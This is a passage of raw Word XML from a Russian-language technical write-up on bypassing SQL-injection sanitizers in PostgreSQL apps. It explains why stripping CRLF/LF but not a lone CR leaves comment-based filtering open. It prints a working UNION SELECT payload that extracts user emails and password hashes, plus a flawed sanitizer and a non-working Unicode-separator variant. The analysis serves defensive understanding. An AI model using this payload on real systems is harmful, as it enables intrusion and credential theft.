          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> считает line-terminator для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-комментария (только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но sanitizer может ошибочно их учитывать как «новая строка». Этот case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на PG (обратное от 3.12.1), но полезен для понимания.</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Encoded CRLF</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%0D%0A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%E2%80%A8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Unicode line-separator U+2028), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%E2%80%A9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (paragraph separator U+2029) — sanitizer на JSON/HTML-уровне может normalize Unicode line-terminators, но PG их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> считает terminator. Аналогично case 2,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для атаки, но создаёт false-positive в sanitizer-логах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полезный case для атаки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только #1 (CR-only)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и его варианты.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — CR-only line-terminator после `--`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: sanitizer Python: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value = value.replace('\r\n', '\n').replace('\n', '\n')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — strip-ает CRLF и LF, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> strip-ает одиночный CR. Custom sanitizer без знания PG-специфики.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Затем sanitizer ловит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комментарий: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value = re.sub(r'--[^\n]*', '', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — удаляет всё от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(но не до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Payload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передаётся как raw bytes через JSON-API, не form): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%75%6E%69%6F%6E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно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admin'--harmless\rUNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где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 литеральный байт 0x0D (передаётся как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в URL-encoded или как raw byte в JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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в результате доходит до сервера:</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FROM articles WHERE title = 'admin'--harmless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(где первый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PG отображается как обрыв строки в визуальной форме).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer Python: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replace('\r\n', '\n')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сам по себе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствует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не trim-ит.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остался.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re.sub(r'--[^\n]*', '', q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ищет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затем любые non-newline-char до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 non-newline по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(потому что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включает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Регекс идёт от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--harmless\rUNION SELECT...FROM users--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до конца — целиком как комментарий. Удаляет.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После sanitize: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 пустая активная часть.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF тоже не видит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(после удаления комментария).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но PG-парсер видит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как line-terminator для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'admin'--harmless</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комментарий до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 конец комментария, начало нового SQL.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UNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — активный SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака пройдёт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативная Python-форма sanitizer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def sanitize(q):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = q.replace('\r\n', '\n')  # CRLF → LF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = q.replace('\n', '')      # strip LF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = re.sub(r'--.*$', '', q, flags=re.MULTILINE)  # strip --comments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.MULTILINE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делает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match-ить любой line-terminator — но Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.MULTILINE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</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как line boundary, не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Поэтому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остаётся неучтённой. Payload пройдёт через тот же gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — Unicode line-separator (PG не реагирует — false positive в sanitizer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: sanitizer на JSON-API уровне normalize-ит Unicode line separators (U+2028, U+2029) до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(это часть JSON.parse в Node.js/Python). Атакующий думает, что U+2028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line-terminator для PG. Но это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">неправильно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG-парсер считает line-terminator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASCII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(0x0A) или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(0x0D); Unicode-line-separator (U+2028 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xE2\x80\xA8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в UTF-8) — обычные UTF-8-байты в строке.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (не работает!):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'--harmless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что доходит до сервера (если sanitizer не trim-ил U+2028):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, title FROM articles WHERE title = 'admin'--harmless&lt;U+2028 как 3 байта UTF-8&gt;UNION SELECT password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG-парсер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--harmless&lt;U+2028 как байты&gt;UNION ...FROM users--'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> конца строки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которых здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">нет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (U+2028 — 3 UTF-8 байта, не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Весь остаток вплоть до конца строки — комментарий. Атака не работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Анти-паттерн</w:t>
      </w:r>
      <w:r>
